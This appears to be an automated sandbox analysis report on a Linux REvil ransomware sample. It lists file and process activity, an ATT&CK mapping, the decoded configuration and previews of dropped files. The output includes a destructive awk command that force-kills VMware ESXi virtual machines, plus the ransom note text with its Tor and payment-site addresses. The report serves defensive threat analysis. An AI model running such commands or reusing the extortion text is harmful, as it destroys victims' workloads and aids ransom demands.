      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.help.PackageRegistryBackend/backenddb.xml (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./wQN5w2558L (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.bash_logout (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.viminfo (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)File: ./.ICEauthority (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: /usr/bin/mousepad (PID: 3040)File: /home/user/.config/ibus/bus (bits: - usr: - grp: - all: rwx)Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)JavaScript file created: /home/user/.mozilla/firefox/u5o5kk16.default/prefs.jsJump to dropped file
      Source: /bin/dash (PID: 2964)Awk executable: /usr/bin/awk -> awk -F "\"*,\"*" "{system(\"esxcli vm process kill --type=force --world-id=\" $1)}"Jump to behavior
      Source: ./wQN5w2558L (PID: 2888)Log file created: /home/user/.cache/upstart/startxfce4.logJump to dropped file
      Source: ./wQN5w2558L (PID: 2888)Log file created: /home/user/.cache/xfce4-indicator-plugin.logJump to dropped file
      Source: ./wQN5w2558L (PID: 2888)Log file created: /home/user/.local/share/gvfs-metadata/home-02b035a1.logJump to dropped file
      Source: ./wQN5w2558L (PID: 2888)Log file created: /home/user/.local/share/gvfs-metadata/root-d269eba3.logJump to dropped file
      Source: ./wQN5w2558L (PID: 2888)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/exo-open (PID: 2755)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 2785)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/xfce4-terminal (PID: 2794)Queries kernel information via 'uname': Jump to behavior
      Source: /bin/bash (PID: 2807)Queries kernel information via 'uname': Jump to behavior
      Source: /bin/uname (PID: 2890)Queries kernel information via 'uname': Jump to behavior
      Source: /bin/hostname (PID: 2891)Queries kernel information via 'uname': Jump to behavior
      Source: /bin/uname (PID: 2898)Queries kernel information via 'uname': Jump to behavior
      Source: /bin/hostname (PID: 2942)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/pkill (PID: 2952)Queries kernel information via 'uname': Jump to behavior
      Source: /usr/bin/mousepad (PID: 3040)Queries kernel information via 'uname': Jump to behavior

      Stealing of Sensitive Information:

      barindex
      Sample reads from .bash_historyShow sources
      Source: ./wQN5w2558L (PID: 2888)File: /home/user/.bash_historyJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1File and Directory Permissions Modification1OS Credential Dumping1Security Software Discovery1Remote ServicesData from Local System1Exfiltration Over Other Network MediumProxy1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Hidden Files and Directories1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Malware Configuration

      Threatname: REvil

      {"pk": "r58UPwgbaRk5py762WpY/rEsl1jd936THXwqUwID/iM=", "pid": "$2a$12$V3e/gZmP0hFlQhnJLAyOM.Fsb56ksfw0p42oLlNwf2Jou485ElO4K", "sub": "7987", "dbg": false, "et": 0, "nbody": "LS0tPT09IFdlbGNvbWUuIEFnYWluLiA9PT0tLS0KClsrXSBXaGF0cyBIYXBwZW4/IFsrXQoKWW91ciBmaWxlcyBhcmUgZW5jcnlwdGVkLCBhbmQgY3VycmVudGx5IHVuYXZhaWxhYmxlLiBZb3UgY2FuIGNoZWNrIGl0OiBhbGwgZmlsZXMgb24geW91ciBzeXN0ZW0gaGFzIGV4dGVuc2lvbiB7RVhUfS4KQnkgdGhlIHdheSwgZXZlcnl0aGluZyBpcyBwb3NzaWJsZSB0byByZWNvdmVyIChyZXN0b3JlKSwgYnV0IHlvdSBuZWVkIHRvIGZvbGxvdyBvdXIgaW5zdHJ1Y3Rpb25zLiBPdGhlcndpc2UsIHlvdSBjYW50IHJldHVybiB5b3VyIGRhdGEgKE5FVkVSKS4KClsrXSBXaGF0IGd1YXJhbnRlZXM/IFsrXQoKSXRzIGp1c3QgYSBidXNpbmVzcy4gV2UgYWJzb2x1dGVseSBkbyBub3QgY2FyZSBhYm91dCB5b3UgYW5kIHlvdXIgZGVhbHMsIGV4Y2VwdCBnZXR0aW5nIGJlbmVmaXRzLiBJZiB3ZSBkbyBub3QgZG8gb3VyIHdvcmsgYW5kIGxpYWJpbGl0aWVzIC0gbm9ib2R5IHdpbGwgbm90IGNvb3BlcmF0ZSB3aXRoIHVzLiBJdHMgbm90IGluIG91ciBpbnRlcmVzdHMuClRvIGNoZWNrIHRoZSBhYmlsaXR5IG9mIHJldHVybmluZyBmaWxlcywgWW91IHNob3VsZCBnbyB0byBvdXIgd2Vic2l0ZS4gVGhlcmUgeW91IGNhbiBkZWNyeXB0IG9uZSBmaWxlIGZvciBmcmVlLiBUaGF0IGlzIG91ciBndWFyYW50ZWUuCklmIHlvdSB3aWxsIG5vdCBjb29wZXJhdGUgd2l0aCBvdXIgc2VydmljZSAtIGZvciB1cywgaXRzIGRvZXMgbm90IG1hdHRlci4gQnV0IHlvdSB3aWxsIGxvc2UgeW91ciB0aW1lIGFuZCBkYXRhLCBjYXVzZSBqdXN0IHdlIGhhdmUgdGhlIHByaXZhdGUga2V5LiBJbiBwcmFjdGlzZSAtIHRpbWUgaXMgbXVjaCBtb3JlIHZhbHVhYmxlIHRoYW4gbW9uZXkuCgpbK10gSG93IHRvIGdldCBhY2Nlc3Mgb24gd2Vic2l0ZT8gWytdCgpZb3UgaGF2ZSB0d28gd2F5czoKCjEpIFtSZWNvbW1lbmRlZF0gVXNpbmcgYSBUT1IgYnJvd3NlciEKICBhKSBEb3dubG9hZCBhbmQgaW5zdGFsbCBUT1IgYnJvd3NlciBmcm9tIHRoaXMgc2l0ZTogaHR0cHM6Ly90b3Jwcm9qZWN0Lm9yZy8KICBiKSBPcGVuIG91ciB3ZWJzaXRlOiBodHRwOi8vYXBsZWJ6dTQ3d2dhemFwZHFrczZ2cmN2NnpjbmpwcGtieGJyNndrZXRmNTZuZjZhcTJubXlveWQub25pb24ve1VJRH0KCjIpIElmIFRPUiBibG9ja2VkIGluIHlvdXIgY291bnRyeSwgdHJ5IHRvIHVzZSBWUE4hIEJ1dCB5b3UgY2FuIHVzZSBvdXIgc2Vjb25kYXJ5IHdlYnNpdGUuIEZvciB0aGlzOgogIGEpIE9wZW4geW91ciBhbnkgYnJvd3NlciAoQ2hyb21lLCBGaXJlZm94LCBPcGVyYSwgSUUsIEVkZ2UpCiAgYikgT3BlbiBvdXIgc2Vjb25kYXJ5IHdlYnNpdGU6IGh0dHA6Ly9kZWNvZGVyLnJlL3tVSUR9CgpXYXJuaW5nOiBzZWNvbmRhcnkgd2Vic2l0ZSBjYW4gYmUgYmxvY2tlZCwgdGhhdHMgd2h5IGZpcnN0IHZhcmlhbnQgbXVjaCBiZXR0ZXIgYW5kIG1vcmUgYXZhaWxhYmxlLgoKV2hlbiB5b3Ugb3BlbiBvdXIgd2Vic2l0ZSwgcHV0IHRoZSBmb2xsb3dpbmcgZGF0YSBpbiB0aGUgaW5wdXQgZm9ybToKS2V5OgoKCntLRVl9CgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiEhISBEQU5HRVIgISEhCkRPTlQgdHJ5IHRvIGNoYW5nZSBmaWxlcyBieSB5b3Vyc2VsZiwgRE9OVCB1c2UgYW55IHRoaXJkIHBhcnR5IHNvZnR3YXJlIGZvciByZXN0b3JpbmcgeW91ciBkYXRhIG9yIGFudGl2aXJ1cyBzb2x1dGlvbnMgLSBpdHMgbWF5IGVudGFpbCBkYW1nZSBvZiB0aGUgcHJpdmF0ZSBrZXkgYW5kLCBhcyByZXN1bHQsIFRoZSBMb3NzIGFsbCBkYXRhLgohISEgISEhICEhIQpPTkUgTU9SRSBUSU1FOiBJdHMgaW4geW91ciBpbnRlcmVzdHMgdG8gZ2V0IHlvdXIgZmlsZXMgYmFjay4gRnJvbSBvdXIgc2lkZSwgd2UgKHRoZSBiZXN0IHNwZWNpYWxpc3RzKSBtYWtlIGV2ZXJ5dGhpbmcgZm9yIHJlc3RvcmluZywgYnV0IHBsZWFzZSBzaG91bGQgbm90IGludGVyZmVyZS4KISEhICEhISAhISEA", "nname": "{EXT}-readme.txt", "rdmcnt": 0, "ext": ".rhkrc"}

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1504951 Sample: wQN5w2558L Startdate: 01/07/2021 Architecture: LINUX Score: 76 81 Found malware configuration 2->81 83 Yara detected REvil Linux Ransomware 2->83 85 Found Tor onion address 2->85 87 Creates a notice file (html or txt) to demand a ransom 2->87 13 wrapper-1.0 exo-open 2->13         started        15 thunar mousepad 2->15         started        process3 process4 17 exo-open 13->17         started        process5 19 exo-open exo-helper-1 17->19         started        process6 21 exo-helper-1 xfce4-terminal 19->21         started        process7 23 xfce4-terminal bash 21->23         started        25 xfce4-terminal gnome-pty-helper 21->25         started        process8 27 bash wQN5w2558L 23->27         started        31 bash 23->31         started        33 bash 23->33         started        35 6 other processes 23->35 file9 73 /home/user/.cache/obexd/rhkrc-readme.txt, ASCII 27->73 dropped 75 /home/user/.cache/...sh/rhkrc-readme.txt, ASCII 27->75 dropped 77 /home/user/.cache/...sh/rhkrc-readme.txt, ASCII 27->77 dropped 79 13 other files (9 malicious) 27->79 dropped 93 Sample reads from .bash_history 27->93 95 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 27->95 37 wQN5w2558L dash 27->37         started        40 wQN5w2558L dash 27->40         started        42 wQN5w2558L dash 27->42         started        44 wQN5w2558L dash 27->44         started        46 bash lesspipe 31->46         started        48 bash dircolors 33->48         started        50 bash ls 35->50         started        signatures10 process11 signatures12 91 Tries to kill VMware ESXi VMs 37->91 52 dash awk 37->52         started        55 dash 37->55         started        57 dash uname 40->57         started        59 dash hostname 40->59         started        61 dash uname 42->61         started        63 dash hostname 42->63         started        65 dash pkill 44->65         started        67 lesspipe 46->67         started        69 lesspipe basename 46->69         started        process13 signatures14 89 Tries to kill VMware ESXi VMs 52->89 71 lesspipe dirname 67->71         started        process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.freedesktop.org/standards/desktop-bookmarksrecently-used.xbel.XEOG50.79.drfalse
        		high
        http://decoder.re/93F57EC393F57EC3bash, 2888.1.000000000104f000.00000000010a7000.rw-.sdmpfalse
          		unknown
          http://www.freedesktop.org/standards/shared-mime-inforecently-used.xbel.XEOG50.79.drfalse
            		high
            http://freedesktop.orgrecently-used.xbel.XEOG50.79.drfalse
              		high
              https://torproject.org/bash, 2888.1.000000000104f000.00000000010a7000.rw-.sdmpfalse
                		high
                http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93F57EC393F57EC3bash, 2888.1.000000000104f000.00000000010a7000.rw-.sdmptrue
                  		unknown

                  Contacted IPs

                  No contacted IP infos

                  Created / dropped Files

                  /home/user/.ICEauthority
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1298
                  Entropy (8bit):7.636456564865164
                  Encrypted:false
                  SSDEEP:24:MQ5GqUntUvDgGFSNO8pfGq9yFaBJKvOSvteUdu947pBnkCRK2DffCQV:3G1o8zNJGq882temQABkcDjV
                  MD5:9CAF06209B3DC15E9FF9E7DF2B5276F8
                  SHA1:45FBAAD7E56088BFA644836E6613A2753DF87719
                  SHA-256:450B61867151E0827ACD0709B947238AD6E34999CE472D0DED5F6900742332FC
                  SHA-512:ED5DD22E1BA73DD01650726AD44845DA5FDF288C10875657A862542B45959ECBF555A02503B8C4209E2A65343B63D241F41C593E273A7C049ECD9B1562F206A9
                  Malicious:false
                  Reputation:low
                  Preview: ...x[.......Y...]w...>*...#QZ...g....d..|-;=.P..bo....U..".H..5.6.....,.,.h.>+h/....P....(l...O..Zo?....XlI...s.9....H.VW..8.....A...Y.....{.'.....a..,,.'s.{~K......ht/..M...%q.... ...Y._^...].j.f_...k..{...X...c....Z`.....qE...R.y....."..b.]H.9..MK.U..-..d........+....,..s`{..u?.M..]...`........6..?.`{....E........./..;.........N.&.;[...'.U,.L>..........@.>.e..j..i.......#....u\...u^ J|...~.]v........B...P..N..>....d...p@U...F.9..~d.78.....Ka..S.4..'...+...(......V2.....Y...g.M..S..Hr...B..0..B.@...p.X...w.;(I.4z.......^s=.A.p.E..[7l."..\g.<..2.1*|..\M..~...|.l...2<b....cL7u..fg......v.......,_.;.a..I......+...<W.X..-.|.|.A`?&-)..........@8/L....A..B.mz%..F.P........-...g.+..].q...H.p..j,.EH..J....dP.?L.............:....7.l.#F.Ra..v...<..J.F.~..6....l....Ng....v."v$..t....xRk..Q.......y.V........&9...w..bD....*v...MJ".=0..u.y.....mT..e....v.<@1.D....%....r..s.z..........$....`.N.4.kd...n>.E..F.|KA....l.x$[...4....X>.0..N.........i.-D.zF..i.:S.Z+...I..:...{...z.c.@4L.Sw....8....{|..b..
                  /home/user/.Xauthority
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):292
                  Entropy (8bit):5.606963257213795
                  Encrypted:false
                  SSDEEP:6:GwRIzx5nUwd+1zmhOO/EUyp6XcwQd5y+O6iH:LROxY2DcUBES+O6S
                  MD5:894A369D5CA004150A5DFB39AE293343
                  SHA1:36660ED69BA3A178FBDB219F077FD3493994C9A3
                  SHA-256:3585CD5D77D336AC3EB33D3500CF45D73320B3CA8979A9C834ED2B3E8A6EF716
                  SHA-512:3D78214EE146F6176B5044D94C987D1B7EF6529FF4CDAAB0A8018961F9D6B0561169AE7B1F3DE3E2E7A76E6F77FB8E4E83AF5335EAB257CA7C5070548514F833
                  Malicious:false
                  Reputation:low
                  Preview: gt.....W3%&".....9...Bv.V..5"....a..z...T..V?.R`.....J.'9..v%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................iY....b<\H....^...{......B..QM...4.B....^.3@.........K..
                  /home/user/.bash_history
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):2701
                  Entropy (8bit):7.850717559518846
                  Encrypted:false
                  SSDEEP:48:nCadUqJ5CSv1LkjZEhAX3O25SN01HycO/QHxF6qi4N/AjJi6oRrZJDSQwA:CtK5FvCGhAp5A6HytoRF26WJ3gDSy
                  MD5:3955D2138F3C30FC4C7B52E1A0D263B6
                  SHA1:F6EA2059724A34734F7640D67E9C7FB6BE9163E5
                  SHA-256:FB8B50A88C43FAB4E7D249BA0ABECA358109F8F00B3950D89A0075569B0B7F99
                  SHA-512:942BA0A6A592022DB51DAE358FC73F8BAE9382747EB4A98ABA2B71212D2767BCB1CE944B4848BD1CA111D00D9208D277D3D9A3AB6D0279CA41FDFA2A46ABB01B
                  Malicious:true
                  Reputation:low
                  Preview: R..pl.qbh...i.Q.q..........c.... x...q..I..L...........>........Q.v.[.j.T.;.|gj..d...G.@[l.....2.T......_..1...J...I.....yRKK.....ua...x.^.kC......%...q...6...X.........]..IG.#..2M......i.Ub...u........].n.z...T..(B..|...8.y.,&d!;4.>wc.So...h.z.S../.e....U...\l..........hf..xn..kUj.=v?...R0..JL|......~.,......X4HJ...%.d.;.K..R<.jP.!ta..7.-/vFG.Dk..w........4!....Zjy.......Qm.6....h../..3.6.......&..o.^.....r.o;......>.8..p..[.#...A.zPF..=...@..E.A.!...wus......h..X.;..........Y.j.8...Ot9]...n...R~........W....N.E.-a...a.{...9..@V.....B#..h....XU..=U.u..{.H&d.#n..O..C:.V!........L..."....J....]5..v[..3..Q..i.(4.h<..N.$.g..a.....{}......}..rw .z.p..O.6W...%.\HY6...q.......7)...E...C.fs+.j.n.J.O......y?...P 5.I....T^..td..D1......v.k..vw<?e.?.3...2M...A...81.....h(....&...8..V...{....5....[...K.o..z..CW..bq;.....m...............8....?..d[.)d.^...mB../W>..T..r...*bnp..N.IV../..=...F..C..6....|.....L.......b.iE.........@t...........zr+.....|.>:....=.........<....-.|.3.,v7D......4V...'.o....
                  /home/user/.bash_logout
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):452
                  Entropy (8bit):6.562608210905155
                  Encrypted:false
                  SSDEEP:6:YvUmIS1bcxloN2pvtYaBPvETkDWau+Ght51zmhOO/EUyp6XcV1Qg6kviGvFil/s:4Uq2oNei+PvETEWfDv/2DcUBCw09ME
                  MD5:9C00B6F93E34D57391E383A4CFEBFF12
                  SHA1:E177EC5AAD47CC2786661029E2620E081FD4D45C
                  SHA-256:DA3FE27F2AEA084FA57EF8E0FF0584E02D061B0E0A355F4118F0E17603C303EC
                  SHA-512:D9BE01D4EDED8F7CE47ABF6F45EC0AA277F8D2FB04F0EB6018FD8D7C00CC47556189190279F84A2BEB48202133F0913F66C6606962FA54958D34799D974942C6
                  Malicious:false
                  Reputation:low
                  Preview: ....o...........&.U.<.}......4-.'........"P<[.A$...m........pS.l..D..}}....RW...v%.lcvz.Ii.\..$`&..E..g_.G...Qc..|g...':..|u...Vu.d.k$O....?.(...)^......c.s..........?....F.v.d.../6.-.......].vYA..|hcVga..[~%...Xv,...h.7%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................t,..in....>{Ai......P..pp?K..1....r...?...........#e.,
                  /home/user/.bashrc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):4003
                  Entropy (8bit):7.904236292667163
                  Encrypted:false
                  SSDEEP:96:wwum0uDNzvKGnnlycxJSwRBH/IRwxcZxxDL:wRm0uDFLlke/IdDxn
                  MD5:3346B625E22693D51B282222B7082244
                  SHA1:64372F404DD9EE90B45C5235B3CDA8960CCC0145
                  SHA-256:2017779FEBF02DC4D42202976D92E55BE94B6546EAD04076C970A69087140327
                  SHA-512:BEF0323D04357BF4906A4963B740A110B40A557DB678DE96E87B5BC3E515ED3F2FE139EE63A9A3F226C94304F019E7E3F2A0CDF4EF45056DF50775A3077DD3B5
                  Malicious:true
                  Reputation:low
                  Preview: ......f..P.Lc..j..8|..aY......+F&..wh....,.*.f.wn.Z.y.8... .D.j-....U.V.a..&....M...2+` .Ae.I......z.......S.lg[n&5....d...8.7....4/u.$.*........o]..`m."S..6.\{A....S@ &..1..........d.tf...nJ..`..{.g.H.Y.....04G..G..J...../N*9...q.z|........n."..3.............f..P..=l...%.i.....U..v...:..y...\D.M..4...5.$.0j=..[T.w.0\..&u...e. .U...k.....B."i.3.OYCG.......J...t..L.1....!%....I.v..V...b.!..uH.....Y....%._R....<.....F.@{9y..3..ulJ(...=u..u1.!0`......!rAM.....'~.....u9.../".....@..'J..1.........Di;k...z...6.p..X....q.....5I..;akg.NFB......g}..........h..^.t!).._....sl...c.(..z37.=.o.....v.1v..N...A..0..b...E..E.J|..<..0.`....^.~W.g...jY...!`.p5.....y|....vp..*.....KA8v.c....Vg.U.-A....`%.S..P..........^.e...}.$.".T..!|?....ox.`...?........j..?X...[.z..!.H.Ob......6-.."....Z...%fw..HIC`4....g........bo(TS...}...J<u.|..l......x.ho.Ff.-..{$kD|.y.8S..7.V."x.n...)<1.....i..g.s.:.|.C..{.<!....7.v.~%N..C.}.J#V..);./_.....L.b..&...}(m.F........[Iq.%.U5I .I@.0"\.q.TX.k.......#..T.+..3m......9AB.=(
                  /home/user/.cache/blueman-applet-1000
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):238
                  Entropy (8bit):4.984373540273447
                  Encrypted:false
                  SSDEEP:3:yInVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1FZ92gu5O0WiYFMR21tlVYv:yIV1zmhOO/EUyp6Xcj2r5O0Wi/QFyv
                  MD5:2880863EF8E9774CF2EB199C02718E57
                  SHA1:BDE1436F158EC9C44A77192417B5839C1FA4D72B
                  SHA-256:123F095D804ED47B726E0D385F06F56CC5BDFA4EB2CD24F1055A22ED47875B48
                  SHA-512:D84479C8266ED6FA56B099796FAB1A52CC5E39CCCA788D2173BA24F803E484E03F3A72C22CB56B890A11267CAC37B7DEE485B2C206D018ADEFFE26F7FB336E2A
                  Malicious:false
                  Reputation:low
                  Preview: ./..'m%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................wJ...G.....EK\.Y..;...G=`.......\SM<..na..............
                  /home/user/.cache/evolution/addressbook/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/addressbook/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/calendar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/calendar/trash/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:true
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.cache/evolution/mail/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
